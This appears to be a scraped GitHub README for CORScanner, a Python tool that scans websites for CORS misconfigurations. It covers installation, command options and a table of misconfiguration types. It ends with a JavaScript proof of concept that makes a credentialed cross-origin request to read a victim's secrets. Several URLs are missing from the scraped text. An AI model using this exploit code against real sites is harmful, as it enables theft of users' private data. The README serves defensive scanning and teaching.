Skip to content
Fast CORS misconfiguration vulnerabilities scanner🍻
Branch: master
Clone or download
Pull request Compare This branch is 1 commit ahead, 3 commits behind chenjj:master.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Type Name Latest commit message Commit time
Failed to load latest commit information.

About CORScanner

CORScanner is a python tool designed to discover CORS misconfigurations vulnerabilities of websites. It helps website administrators and penetration testers to check whether the domains/urls they are targeting have insecure CORS policies.


  • Fast. It uses gevent instead of Python threads for concurrency, which is much faster for network scanning.
  • Comprehensive. It covers all the common types of CORS misconfigurations we know.
  • Flexible. It supports various self-define features (e.g. file output), which is helpful for large-scale scanning.

Two useful references for understanding CORS systematically:




  • Download this tool
git clone
  • Install dependencies
sudo pip install -r requirements.txt

CORScanner depends on the requests, gevent, tld, colorama and argparse python modules.

Python Version:

  • Both Python 2 (2.7.x) and Python 3 (3.7.x) are supported.


Short Form Long Form Description
-u --url URL/domain to check it's CORS policy
-d --headers Add headers to the request
-i --input URL/domain list file to check their CORS policy
-t --threads Number of threads to use for CORS scan
-o --output Save the results to json file
-v --verbose Enable the verbose mode and display results in realtime
-h --help show the help message and exit


  • To check CORS misconfigurations of specific domain:

python -u

  • To check CORS misconfigurations of specific URL:

python -u

  • To check CORS misconfiguration with specific headers:

python -u -d "Cookie: test"

  • To check CORS misconfigurations of multiple domains/URLs:

python -i top_100_domains.txt -t 100

  • To list all the basic options and switches use -h switch:

python -h

Misconfiguration types

This tool covers the following misconfiguration types:

Misconfiguration type Description
Reflect_any_origin Blindly reflect the Origin header value in Access-Control-Allow-Origin headers in responses, which means any website can read its secrets by sending cross-orign requests.
Prefix_match trusts, which is an attacker's domain.
Suffix_match trusts, which could be registered by an attacker.
Not_escape_dot trusts, which could be registered by an attacker.
Substring match trusts, which could be registered by an attacker.
Trust_null trusts null, which can be forged by iframe sandbox scripts
HTTPS_trust_HTTP Risky trust dependency, a MITM attacker may steal HTTPS site secrets
Trust_any_subdomain Risky trust dependency, a subdomain XSS may steal its secrets
custom_third_parties Custom unsafe third parties origins like, see more in origins.json file. Thanks @phackt!

Welcome to contribute more.

Exploitation examples

Here is an example about how to exploit "Reflect_any_origin" misconfiguration on Secrets on can be read by any malicious website(in the demo we use localhost as the malicious website). video on Youtube:


Here is the exploitation code:

    // Send a cross origin request to the server, when a victim visits the page.
    var req = new XMLHttpRequest();'GET',"",true);
    req.onload = stealData;
    req.withCredentials = true;

    function stealData(){
        //reading response is allowed because of the CORS misconfiguration.
        var data= JSON.stringify(JSON.parse(this.responseText),null,2);

        //display the data on the page. A real attacker can send the data to his server.

    function output(inp) {
        document.body.appendChild(document.createElement('pre')).innerHTML = inp;

If you have understood how the demo works, you can read Section 5 and Section 6 of the CORS paper and know how to exploit other misconfigurations.


CORScanner is licensed under the MIT license. take a look at the LICENSE for more information.


This work is inspired by the following excellent researches:

  • James Kettle, “Exploiting CORS misconfigurations for Bitcoins and bounties”, AppSecUSA 2016*
  • Evan Johnson, “Misconfigured CORS and why web appsec is not getting easier”, AppSecUSA 2016*
  • Von Jens Müller, "CORS misconfigurations on a large scale", CORStest*


Current version is 1.0

You can’t perform that action at this time.